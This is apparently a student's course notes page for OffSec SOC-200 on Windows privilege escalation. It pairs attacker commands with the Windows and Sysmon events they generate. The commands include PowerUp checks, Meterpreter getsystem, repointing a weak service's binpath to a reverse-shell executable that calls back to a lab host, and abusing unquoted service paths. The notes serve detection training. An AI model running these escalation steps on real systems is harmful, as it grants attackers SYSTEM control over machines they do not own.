Tree's Notes
  • Overview
  • Tools & Cheatsheets
  • Hacking Methodology
  • Hands-on Practice
  • Linux
    • Linux Basics
  • Windows
    • Windows Basics
  • MacOS
    • MacOS Basics
  • Web
    • Web Basics
  • Mobile
    • iOS
    • Android
  • OS Agnostic
    • Template
  • Courses
    • Hack The Box
      • Bug Bounty Hunter
        • Module 1: Web Requests
        • Module 2: Introduction to Web Applications
        • Module 3: Using Web Proxies
        • Module 4: Information Gathering - Web Edition
        • Module 5: Attacking Web Applications with Ffuf
        • Module 6: JavaScript Deobfuscation
        • Module 7: Cross-Site Scripting (XSS)
        • Module 8: SQL Injection Fundamentals
        • Module 9: SQLMap Essentials
        • Module 10: Command Injections
        • Module 11: File Upload Attacks
        • Module 12: Server-Side Attacks
        • Module 13: Login Brute Forcing
        • Module 14: Broken Authentication
        • Module 15: Web Attacks
        • Module 16: File Inclusion
        • Module 17: Session Security
        • Module 18: Web Service & API Attacks
        • Module 19: Hacking Wordpress
        • Module 20: Bug Bounty Hunting Process
    • OffSec
      • 🦊EXP-301
        • Module 1: Windows User Mode Exploit Development: General Course Information
        • Module 2: WinDbg and x86 Architecture
        • Module 3: Exploiting Stack Overflows
        • Module 4: Exploiting SEH Overflows
        • Module 5: Introduction to IDA Pro
        • Module 6: Overcoming Space Restrictions: Egghunters
        • Module 7: Creating Custom Shellcode
        • Module 8: Reverse Engineering for Bugs
        • Module 9: Stack Overflows and DEP Bypass
        • Module 10: Stack Overflows and ASLR Bypass
        • Module 11: Format String Specifier Attack Part I
        • Module 12: Format String Specifier Attack Part II
        • Module 13: Trying Harder: The Labs
      • 🐙EXP-312
        • Module 1: macOS Control Bypasses: General Course Information
        • Module 2: Virtual Machine Setup Guide
        • Module 3: Introduction to macOS
        • Module 4: macOS Binary Analysis Tools
        • Module 5: The Art of Crafting Shellcodes
        • Module 6: The Art of Crafting Shellcodes (Apple Silicon Edition)
        • Module 7: Dylib Injection
        • Module 8: The Mach Microkernel
        • Module 9: XPC Attacks
        • Module 10: Function Hooking on macOS
        • Module 11: The macOS Sandbox
        • Module 12: Bypassing Transparency, Consent, and Control (Privacy)
        • Module 13: GateKeeper Internals
        • Module 14: Bypassing GateKeeper
        • Module 15: Symlink and Hardlink Attacks
        • Module 16: Injecting Code into Electron Applications
        • Module 17: Getting Kernel Code Execution
        • Module 18: Mach IPC Exploitation
        • Module 19: macOS Penetration Testing
        • Module 20: Chaining Exploits on macOS Ventura
        • Module 21: Mount(ain) of Bugs (archived)
      • ⚓IR-200
        • Module 1: Incident Response Overview
        • Module 2: Fundamentals of Incident Response
        • Module 3: Phases of Incident Response
        • Module 4: Incident Response Communication Plans
        • Module 5: Common Attack Techniques
        • Module 6: Incident Detection and Identification
        • Module 7: Initial Impact Assessment
        • Module 8: Digital Forensics for Incident Responders
        • Module 9: Incident Response Case Management
        • Module 10: Active Incident Containment
        • Module 11: Incident Eradication and Recovery
        • Module 12: Post-Mortem Reporting
        • Module 13: Incident Response Challenge Labs
      • 🐉PEN-103
      • 🐲PEN-200
        • Module 1: Copyright
        • Module 2: Penetration Testing with Kali Linux: General Course Information
        • Module 3: Introduction to Cybersecurity
        • Module 4: Effective Learning Strategies
        • Module 5: Report Writing for Penetration Testers
        • Module 6: Information Gathering
        • Module 7: Vulnerability Scanning
        • Module 8: Introduction to Web Application Attacks
        • Module 9: Common Web Application Attacks
        • Module 10: SQL Injection Attacks
        • Module 11: Client-side Attacks
        • Module 12: Locating Public Exploits
        • Module 13: Fixing Exploits
        • Module 14: Antivirus Evasion
        • Module 15: Password Attacks
        • Module 16: Windows Privilege Escalation
        • Module 17: Linux Privilege Escalation
        • Module 18: Port Redirection and SSH Tunneling
        • Module 19: Tunneling Through Deep Packet Inspection
        • Module 20: The Metasploit Framework
        • Module 21: Active Directory Introduction and Enumeration
        • Module 22: Attacking Active Directory Authentication
        • Module 23: Lateral Movement in Active Directory
        • Module 24: Enumerating AWS Cloud Infrastructure
        • Module 25: Attacking AWS Cloud Infrastructure
        • Module 26: Assembling the Pieces
        • Module 27: Trying Harder: The Challenge Labs
      • 🛜PEN-210
        • Module 1: IEEE 802.11
        • Module 2: Wireless Networks
        • Module 3: Wi-Fi Encryption
        • Module 4: Linux Wireless Tools, Drivers, and Stacks
        • Module 5: Wireshark Essentials
        • Module 6: Frames and Network Interaction
        • Module 7: Aircrack-ng Essentials
        • Module 8: Cracking Authentication Hashes
        • Module 9: Attacking WPS Networks
        • Module 10: Rogue Access Points
        • Module 11: Attacking Captive Portals
        • Module 12: Attacking WPA Enterprise
        • Module 13: bettercap Essentials
        • Module 14: Determining Chipsets and Drivers
        • Module 15: Kismet Essentials
        • Module 16: Manual Network Connections
      • 🔗PEN-300
        • Module 1: Evasion Techniques and Breaching Defenses: General Course Information
        • Module 2: Operating System and Programming Theory
        • Module 3: Client Side Code Execution With Office
        • Module 4: Phishing with Microsoft Office
        • Module 5: Client Side Code Execution With Windows Script Host
        • Module 6: Reflective PowerShell
        • Module 7: Process Injection and Migration
        • Module 8: Introduction to Antivirus Evasion
        • Module 9: Advanced Antivirus Evasion
        • Module 10: Application Whitelisting
        • Module 11: Bypassing Network Filters
        • Module 12: Linux Post-Exploitation
        • Module 13: Kiosk Breakouts
        • Module 14: Windows Credentials
        • Module 15: Windows Lateral Movement
        • Module 16: Linux Lateral Movement
        • Module 17: Microsoft SQL Attacks
        • Module 18: Active Directory Exploitation
        • Module 19: Attacking Active Directory
        • Module 20: Combining the Pieces
        • Module 21: Trying Harder: The Labs
      • ⚛️SEC-100
      • 🛡️SOC-200
        • Module 1: Introduction to SOC-200
        • Module 2: Attacker Methodology Introduction
        • Module 3: Windows Endpoint Introduction
        • Module 4: Windows Server Side Attacks
        • Module 5: Windows Client-Side Attacks
        • Module 6: Windows Privilege Escalation
        • Module 7: Windows Persistence
        • Module 8: Linux Endpoint Introduction
        • Module 9: Linux Server Side Attacks
        • Module 10: Linux Privilege Escalation
        • Module 11: Network Detections
        • Module 12: Antivirus Alerts and Evasion
        • Module 13: Active Directory Enumeration
        • Module 14: Network Evasion and Tunneling
        • Module 15: Windows Lateral Movement
        • Module 16: Active Directory Persistence
        • Module 17: SIEM Part One: Intro to ELK
        • Module 18: SIEM Part Two: Combining the Logs
        • Module 19: Trying Harder: The Labs
      • TH-200
        • Module 1: Threat Hunting Concepts and Practices
        • Module 2: Threat Actor Landscape Overview
        • Module 3: Communication and Reporting for Threat Hunters
        • Module 4: Hunting With Network Data
        • Module 5: Hunting on Endpoints
        • Module 6: Theat Hunting Without IoCs
        • Module 7: Threat Hunting Challenge Labs
      • 🦉WEB-200
        • Module 1: Introduction to WEB-200
        • Module 2: Tools (archived)
        • Module 3: Web Application Enumeration Methodology
        • Module 4: Introduction to Burp Suite
        • Module 5: Cross-Site Scripting Introduction and Discovery
        • Module 6: Cross-Site Scripting Exploitation and Case Study
        • Module 7: Cross-Origin Attacks
        • Module 8: Introduction to SQL
        • Module 9: SQL Injection
        • Module 10: Directory Traversal Attacks
        • Module 11: XML External Entities
        • Module 12: Server-side Template Injection - Discovery and Exploitation
        • Module 13: Command Injection
        • Module 14: Server-side Request Forgery
        • Module 15: Insecure Direct Object Referencing
        • Module 16: Assembling the Pieces: Web Application Assessment Breakdown
      • 🕷️WEB-300
        • Module 1: Introduction
        • Module 2: Tools & Methodologies
        • Module 3: ManageEngine Applications Manager AMUserResourcesSyncServlet SSQL Injection RCE
        • Module 4: DotNetNuke Cookie Deserialization RCE
        • Module 5: ERPNext Authentication Bypass and Remote Code Execution
        • Module 6: openCRX Authentication Bypass and Remote Code Execution
        • Module 7: openITCOCKPIT XSS and OS Command Injection - Blackbox
        • Module 8: Concord Authentication Bypass to RCE
        • Module 9: Server-Side Request Forgery
        • Module 10: Guacamole Lite Prototype Pollution
        • Module 11: Dolibarr Eval Filter Bypass RCE
        • Module 12: RudderStack SQLi and Coraza WAF Bypass
        • Module 13: Conclusion
        • Module 14: ATutor Authentication Bypass and RCE (archived)
        • Module 15: ATutor LMS Type Juggling Vulnerability (archived)
        • Module 16: Atmail Mail Server Appliance: from XSS to RCE (archived)
        • Module 17: Bassmaster NodeJS Arbitrary JavaScript Injection Vulnerability (archived)
    • SANS
      • FOR572
Powered by GitBook
On this page
  • Privilege Escalation Introduction
  • Privilege Escalation Enumeration
  • User Account Control
  • Bypassing UAC
  • Escalating to SYSTEM
  • Service Creation
  • Attacking Service Permissions
  • Leveraging Unquoted Service Paths
Edit on GitHub
  1. Courses
  2. OffSec
  3. SOC-200

Module 6: Windows Privilege Escalation

PreviousModule 5: Windows Client-Side AttacksNextModule 7: Windows Persistence

Last updated 5 months ago

Privilege Escalation Introduction

Privilege Escalation Enumeration

Privileges are the permissions of a specific account to perform system-related local operations. i.e. modifying the filesystem, adding users, shutting down the system, etc.

For these to be effective, Windows uses access tokens. These tokens are uniquely identified via a security identifier or SID. These are generated/maintained by the Local Security Authority.

From Windows Vista onward, processes run on four integrity levels, which align with various rights:

  • System integrity process: SYSTEM rights

  • High integrity process: administrative rights

  • Medium integrity process: standard user rights

  • Low integrity process: very restricted rights often used in processes

Using AccessChk from SysInternals to search for files or directories with Everyone having write permissions

PS C:\tools\windows_privilege_escalation> .\accesschk64.exe -uws "Everyone" "C:\Program Files (x86)\"

Accesschk v6.13 - Reports effective permissions for securable objects
Copyright - 2006-2020 Mark Russinovich
Sysinternals - www.sysinternals.com

RW C:\Program Files (x86)\IObit

PowerUp is another useful tool for identifying several common Windows misconfigurations.

PowerUp privilege escalation enumeration

PS C:\tools\windows_privilege_escalation> Import-Module .\PowerUp.ps1

PS C:\tools\windows_privilege_escalation> Invoke-AllChecks | Format-List

...
Check         : User In Local Group with Admin Privileges
AbuseFunction : Invoke-WScriptUACBypass -Command "..."

...
ServiceName    : IObitUnSvr
Path           : C:\Program Files (x86)\IObit\IObit Uninstaller\IUService.exe
ModifiablePath : @{ModifiablePath=C:\Program Files (x86)\IObit; IdentityReference=Everyone;
                 Permissions=System.Object[]}
StartName      : LocalSystem
AbuseFunction  : Write-ServiceBinary -Name 'IObitUnSvr' -Path <HijackPath>
CanRestart     : False
Name           : IObitUnSvr
Check          : Unquoted Service Paths
...
ServiceName   : Serviio
Path          : 'C:\Program Files\Serviio\bin\ServiioService.exe'
StartName     : LocalSystem
AbuseFunction : Invoke-ServiceAbuse -Name 'Serviio'
CanRestart    : True
Name          : Serviio
Check         : Modifiable Services

User Account Control

User Account Control (UAC) is a Microsoft access control system introduced in Windows Vista and Windows Server 2008. The goal of UAC is that any application wishing to perform an operation with potentially system-wide impact, must inform the user and request approval to do so.

Bypassing UAC

Escalating to SYSTEM

Service Creation

Options for getsystem in Meterpreter

meterpreter > getsystem -h
Usage: getsystem [options]

Attempt to elevate your privilege to that of local system.

OPTIONS:

    -h        Help Banner.
    -t <opt>  The technique to use. (Default to '0').
                0 : All techniques available
                1 : Named Pipe Impersonation (In Memory/Admin)
                2 : Named Pipe Impersonation (Dropper/Admin)
                3 : Token Duplication (In Memory/Admin)
                4 : Named Pipe Impersonation (RPCSS variant)

Successful elevation of privileges using getsystem

meterpreter > localtime
Local Date/Time: 2021-06-30 12:49:27.569 Eastern Daylight Time (UTC-500)

meterpreter > getsystem 1
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).

Meterpreter now running with SYSTEM-level privileges

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

Importing Get-Security.psm1

[192.168.51.10]: PS C:\tools\windows_privilege_escalation> Import-Module C:\Sysmon\Get-Security.psm1
[192.168.51.10]: PS C:\tools\windows_privilege_escalation>

New Service created events

[192.168.51.10]: PS C:\tools\windows_privilege_escalation> Get-SecurityEvent $null "6/30/2021 12:49:00" "6/30/2021 12:50:00"

   ProviderName: Microsoft-Windows-Security-Auditing
                                       
TimeCreated              Id LevelDisplayName Message                                       
-----------              -- ---------------- -------
...
6/30/2021 12:49:32 PM  4697 Information      A service was installed in the system....

New Service installed events use event ID 4697.

Details of New Windows Service event

[192.168.51.10]: PS C:\tools\windows_privilege_escalation> Get-SecurityEvent 4697 "6/30/2021 12:49:31" "6/30/2021 12:49:33" | Format-List

TimeCreated  : 6/30/2021 12:49:32 PM
ProviderName : Microsoft-Windows-Security-Auditing
Id           : 4697
Message      : A service was installed in the system.
               
               Subject:
                Security ID:            S-1-5-21-1241977418-156118851-1443169900-1001
                Account Name:           offsec
                Account Domain:         CLIENT01
                Logon ID:               0xCD626
               
               Service Information:
                Service Name:           hvaukz
                Service File Name:      cmd.exe /c echo hvaukz > \\.\pipe\hvaukz
                Service Type:           0x10
                Service Start Type:     3
                Service Account:        LocalSystem

Sysmon events generated

[192.168.51.10]: PS C:\tools\windows_privilege_escalation> Import-Module C:\Sysmon\Get-Sysmon.psm1

[192.168.51.10]: PS C:\tools\windows_privilege_escalation> Get-SysmonEvent $null "06/30/2021 12:49:31" "06/30/2021 12:50:00"

   ProviderName: Microsoft-Windows-Sysmon

TimeCreated                      Id LevelDisplayName Message
-----------                      -- ---------------- -------
...
6/30/2021 12:49:32 PM            13 Information      Registry value set:...
6/30/2021 12:49:32 PM             1 Information      Process Create:...
6/30/2021 12:49:32 PM            13 Information      Registry value set:...
6/30/2021 12:49:32 PM            13 Information      Registry value set:...

Reviewing the RegistryEvents

[192.168.51.10]: PS C:\tools\windows_privilege_escalation> Get-SysmonEvent 13 "06/30/2021 12:49:31" "06/30/2021 12:49:33" | Format-List

TimeCreated  : 6/30/2021 12:49:32 PM
ProviderName : Microsoft-Windows-Sysmon
Id           : 13
Message      : Registry value set:
               RuleName: T1031,T1050
               EventType: SetValue
               UtcTime: 2021-06-30 16:49:32.936
               ProcessGuid: {71c0553d-db66-60d9-0a00-000000002900}
               ProcessId: 640
               Image: C:\Windows\system32\services.exe
               TargetObject: HKLM\System\CurrentControlSet\Services\hvaukz\Start
               Details: DWORD (0x00000004)

TimeCreated  : 6/30/2021 12:49:32 PM
ProviderName : Microsoft-Windows-Sysmon
Id           : 13
Message      : Registry value set:
               RuleName: T1031,T1050
               EventType: SetValue
               UtcTime: 2021-06-30 16:49:32.921
               ProcessGuid: {71c0553d-db66-60d9-0a00-000000002900}
               ProcessId: 640
               Image: C:\Windows\system32\services.exe
               TargetObject: HKLM\System\CurrentControlSet\Services\hvaukz\ImagePath
               Details: cmd.exe /c echo hvaukz > \\.\pipe\hvaukz

TimeCreated  : 6/30/2021 12:49:32 PM
ProviderName : Microsoft-Windows-Sysmon
Id           : 13
Message      : Registry value set:
               RuleName: T1031,T1050
               EventType: SetValue
               UtcTime: 2021-06-30 16:49:32.921
               ProcessGuid: {71c0553d-db66-60d9-0a00-000000002900}
               ProcessId: 640
               Image: C:\Windows\system32\services.exe
               TargetObject: HKLM\System\CurrentControlSet\Services\hvaukz\Start
               Details: DWORD (0x00000003)

Reviewing the ProcessCreate event

[192.168.51.10]: PS C:\tools\windows_privilege_escalation> Get-SysmonEvent 1 "06/30/2021 12:49:31" "06/30/2021 12:49:33" | Format-List

TimeCreated  : 6/30/2021 12:49:32 PM
ProviderName : Microsoft-Windows-Sysmon
Id           : 1
Message      : Process Create:
               RuleName: -
               UtcTime: 2021-06-30 16:49:32.937
               ProcessGuid: {71c0553d-a09c-60dc-6b05-000000002900}
               ProcessId: 7684
               Image: C:\Windows\System32\cmd.exe
               FileVersion: 10.0.19041.746 (WinBuild.160101.0800)
               Description: Windows Command Processor
               Product: Microsoft® Windows® Operating System
               Company: Microsoft Corporation
               OriginalFileName: Cmd.Exe
               CommandLine: cmd.exe /c echo hvaukz > \\.\pipe\hvaukz
               CurrentDirectory: C:\Windows\system32\
               User: NT AUTHORITY\SYSTEM
               LogonGuid: {71c0553d-db66-60d9-e703-000000000000}
               LogonId: 0x3E7
               TerminalSessionId: 0
               IntegrityLevel: System
               Hashes: MD5=8A2...
               ParentProcessGuid: {71c0553d-db66-60d9-0a00-000000002900}
               ParentProcessId: 640
               ParentImage: C:\Windows\System32\services.exe
               ParentCommandLine: C:\Windows\system32\services.exe

Checking if the keys or services still exist

[192.168.51.10]: PS C:\tools\windows_privilege_escalation> Get-ItemProperty -Path HKLM:\SYSTEM\CurrentControlSet\Services\hvaukz

Get-ItemProperty : Cannot find path
'HKLM:\SYSTEM\CurrentControlSet\Services\hvaukz' because it does not exist.
    + CategoryInfo : ObjectNotFound:
    (HKLM:\SYSTEM\Cu...Services\hvaukz:String) [Get-ItemProperty],
    ItemNotFoundException
    + FullyQualifiedErrorId :
    PathNotFound,Microsoft.PowerShell.Commands.GetItemPropertyCommand
                                    
[192.168.51.10]: PS C:\tools\windows_privilege_escalation> Get-Service hvaukz

Get-Service : Cannot find any service with service name 'hvaukz'.
    + CategoryInfo : ObjectNotFound: (hvaukz:String) [Get-Service],
    ServiceCommandException
    + FullyQualifiedErrorId :
    NoServiceFoundForGivenName,Microsoft.PowerShell.Commands.GetServiceCommand

Attacking Service Permissions

In some cases an attacker can just modify an existing service directly rather than creating their own.

Querying the Update Orchestrator Service

PS C:\tools\windows_privilege_escalation> sc.exe qc usosvc
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: usosvc
        TYPE               : 20  WIN32_SHARE_PROCESS
        START_TYPE         : 2   AUTO_START  (DELAYED)
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Windows\system32\svchost.exe -k netsvcs -p
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : Update Orchestrator Service
        DEPENDENCIES       : rpcss
        SERVICE_START_NAME : LocalSystem

When querying services with Service Control in PowerShell, we need to use the sc.exe filename and not just sc. The Set-Content cmdlet in PowerShell can be abbreviated with sc, and the PowerShell prompt prioritizes cmdlets over Windows commands.

Enumerating permissions of a service with accesschk64.exe

PS C:\tools\windows_privilege_escalation> .\accesschk64.exe -c Serviio -l
Accesschk v6.13 - Reports effective permissions for securable objects
Copyright ⌐ 2006-2020 Mark Russinovich
Sysinternals - www.sysinternals.com

Serviio
  DESCRIPTOR FLAGS:
      [SE_DACL_PRESENT]
      [SE_SACL_PRESENT]
      [SE_SELF_RELATIVE]
  OWNER: NT AUTHORITY\SYSTEM
  [0] ACCESS_ALLOWED_ACE_TYPE: NT AUTHORITY\SYSTEM
        SERVICE_QUERY_STATUS
        SERVICE_QUERY_CONFIG
        SERVICE_INTERROGATE
        SERVICE_ENUMERATE_DEPENDENTS
        SERVICE_PAUSE_CONTINUE
        SERVICE_START
        SERVICE_STOP
        SERVICE_USER_DEFINED_CONTROL
        READ_CONTROL
  [1] ACCESS_ALLOWED_ACE_TYPE: BUILTIN\Administrators
        SERVICE_ALL_ACCESS
  [2] ACCESS_ALLOWED_ACE_TYPE: NT AUTHORITY\INTERACTIVE
        SERVICE_QUERY_STATUS
        SERVICE_QUERY_CONFIG
        SERVICE_INTERROGATE
        SERVICE_ENUMERATE_DEPENDENTS
        SERVICE_USER_DEFINED_CONTROL
        READ_CONTROL
  [3] ACCESS_ALLOWED_ACE_TYPE: NT AUTHORITY\SERVICE
        SERVICE_QUERY_STATUS
        SERVICE_QUERY_CONFIG
        SERVICE_INTERROGATE
        SERVICE_ENUMERATE_DEPENDENTS
        SERVICE_USER_DEFINED_CONTROL
        READ_CONTROL
  [4] ACCESS_ALLOWED_ACE_TYPE: NT AUTHORITY\Authenticated Users
        SERVICE_QUERY_STATUS
        SERVICE_QUERY_CONFIG
        SERVICE_CHANGE_CONFIG
        SERVICE_START
        SERVICE_STOP
        READ_CONTROL

All authenticated users have access to SERVICE_CHANGE_CONFIG, SERVICE_START, and SERVICE_STOP.

Querying the Serviio service

PS C:\tools\windows_privilege_escalation> sc.exe qc Serviio
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: Serviio
        TYPE               : 110  WIN32_OWN_PROCESS (interactive)
        START_TYPE         : 3   DEMAND_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Program Files\Serviio\bin\ServiioService.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : Serviio
        DEPENDENCIES       : HTTP
        SERVICE_START_NAME : LocalSystem

Modifying the service to point to a reverse shell instead

PS C:\tools\windows_privilege_escalation> C:\Windows\system32\sc.exe config Serviio binpath= 'C:\tools\windows_privilege_escalation\servshell_443.exe'
[SC] ChangeServiceConfig SUCCESS

PS C:\tools\windows_privilege_escalation> Get-Date

Thursday, July 1, 2021 10:42:42 AM

Starting the Serviio service

PS C:\tools\windows_privilege_escalation> net start serviio
The Serviio service is starting.
The Serviio service could not be started.

The service did not report an error.

More help is available by typing NET HELPMSG 3534.

This fails, however that is just because the binary does not behave like a service and thus the error can be ignored. Checking the meterpreter shell shows it ran just fine.

[*] https://192.168.51.50:443 handling request from 192.168.51.10;
(UUID: ia20jikd) Staging x64 payload (201308 bytes) ...
[*] Meterpreter session 1 opened (192.168.51.50:443 ->
192.168.51.10:51100) at 2021-07-01 10:56:10 -0400

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

ProcessCreate event showing the modification to the service

[192.168.51.10]: PS C:\tools\windows_privilege_escalation> Get-SysmonEvent 1 "7/1/2021 10:42:00" "7/1/2021 10:42:59" | Format-List


TimeCreated  : 7/1/2021 10:42:38 AM
ProviderName : Microsoft-Windows-Sysmon
Id           : 1
Message      : Process Create:
               RuleName: -
               UtcTime: 2021-07-01 14:42:38.812
               ProcessGuid: {71c0553d-d472-60dd-6a02-000000002a00}
               ProcessId: 4060
               Image: C:\Windows\System32\sc.exe
               FileVersion: 10.0.19041.1 (WinBuild.160101.0800)
               Description: Service Control Manager Configuration Tool
               Product: Microsoft® Windows® Operating System
               Company: Microsoft Corporation
               OriginalFileName: sc.exe
               CommandLine: "C:\Windows\system32\sc.exe" config Serviio binpath= C:\tools\windows_privilege_escalation\servshell_443.exe
               CurrentDirectory: C:\tools\windows_privilege_escalation\
               User: CLIENT01\offsec
               LogonGuid: {71c0553d-bbdf-60dc-7ef2-010000000000}
               LogonId: 0x1F27E
               TerminalSessionId: 1
               IntegrityLevel: Medium
               Hashes: MD5=3FB5CF71F7E7EB49790CB0E663434D80,SHA256=41F067C3A11B02FE39947F9EBA68AE5C7CB5BD1872A6009A4CD1506554A9ABA9,IMPHASH=803254E010814E69947095A2725B2AFD
               ParentProcessGuid: {71c0553d-cb31-60dc-2501-000000002a00}
               ParentProcessId: 6856
               ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
               ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"

RegistryEvent entry for the service change as well

[192.168.51.10]: PS C:\tools\windows_privilege_escalation> Get-SysmonEvent 13 "7/1/2021 10:42:00" "7/1/2021 10:42:59" | Format-List


TimeCreated  : 7/1/2021 10:42:38 AM
ProviderName : Microsoft-Windows-Sysmon
Id           : 13
Message      : Registry value set:
               RuleName: T1031,T1050
               EventType: SetValue
               UtcTime: 2021-07-01 14:42:38.834
               ProcessGuid: {71c0553d-bbdd-60dc-0b00-000000002a00}
               ProcessId: 704
               Image: C:\Windows\system32\services.exe
               TargetObject: HKLM\System\CurrentControlSet\Services\Serviio\ImagePath
               Details: C:\tools\windows_privilege_escalation\servshell_443.exe

ProcessCreate events from starting the service

[192.168.51.10]: PS C:\tools\windows_privilege_escalation> Get-SysmonEvent $null "7/1/2021 10:56:00" "7/1/2021 10:56:20"

   ProviderName: Microsoft-Windows-Sysmon

TimeCreated                       Id LevelDisplayName Message
-----------                       -- ---------------- -------
...
7/1/2021 10:56:10 AM               1 Information      Process Create:...
7/1/2021 10:56:10 AM               1 Information      Process Create:...
7/1/2021 10:56:10 AM               1 Information      Process Create:...

Chain of ProcessCreate events after starting the service

[192.168.51.10]: PS C:\tools\windows_privilege_escalation> Get-SysmonEvent 1 "7/1/2021 10:56:09" "7/1/2021 10:56:11" | Format-List @{ Label = 'UtcTime'; Expression = { $_.properties[1].value }}, @{ Label = 'Image'; Expression = { $_.properties[4].value }}, @{ Label = 'ProcessId'; Expression = { $_.properties[3].value }}, @{ Label = 'CommandLine'; Expression = { $_.properties[10].value }}, @{Label = 'User'; Expression = { $_.properties[12].value }}, @{ Label = 'ParentImage'; Expression = { $_.properties[20].value }}, @{ Label = 'ParentProcessId'; Expression = { $_.properties[19].value }}

UtcTime         : 2021-07-01 14:56:10.532
Image           : C:\tools\windows_privilege_escalation\servshell_443.exe
ProcessId       : 5668
CommandLine     : C:\tools\windows_privilege_escalation\servshell_443.exe
User            : NT AUTHORITY\SYSTEM
ParentImage     : C:\Windows\System32\services.exe
ParentProcessId : 704

UtcTime         : 2021-07-01 14:56:10.511
Image           : C:\Windows\System32\net1.exe
ProcessId       : 6168
CommandLine     : C:\Windows\system32\net1 start serviio
User            : CLIENT01\offsec
ParentImage     : C:\Windows\System32\net.exe
ParentProcessId : 4392

UtcTime         : 2021-07-01 14:56:10.493
Image           : C:\Windows\System32\net.exe
ProcessId       : 4392
CommandLine     : "C:\Windows\system32\net.exe" start serviio
User            : CLIENT01\offsec
ParentImage     : C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
ParentProcessId : 3700

Leveraging Unquoted Service Paths

Unquoted service paths can allow an attacker to place an executable file along the path to be executed.

Example: A service binary is stored in a path such as C:\Program Files\My Program\My Service\service.exe. If this is unquoted then Windows will attempt to execute a binary from the following paths:

  • C:\Program.exe

  • C:\Program Files\My.exe

  • C:\Program Files\My Program\My.exe

  • C:\Program Files\My Program\My Service\service.exe

Querying service to identify its path

PS C:\tools\windows_privilege_escalation> sc.exe qc IOBitUnSvr
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: IOBitUnSvr
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 0   IGNORE
        BINARY_PATH_NAME   : C:\Program Files (x86)\IObit\IObit Uninstaller\IUService.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : IObit Uninstaller Service
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem

FodHelper is just one method of bypassing UAC for elevated privileges. The project details other Windows-based privilege escalation techniques including bypasses for UAC. The MITRE website also details various UAC bypass techniques used by .

🛡️
sandboxed
Living Off The Land Binaries and Scripts
APTs
UAC Bypass – FodhelperPenetration Testing Lab
Logo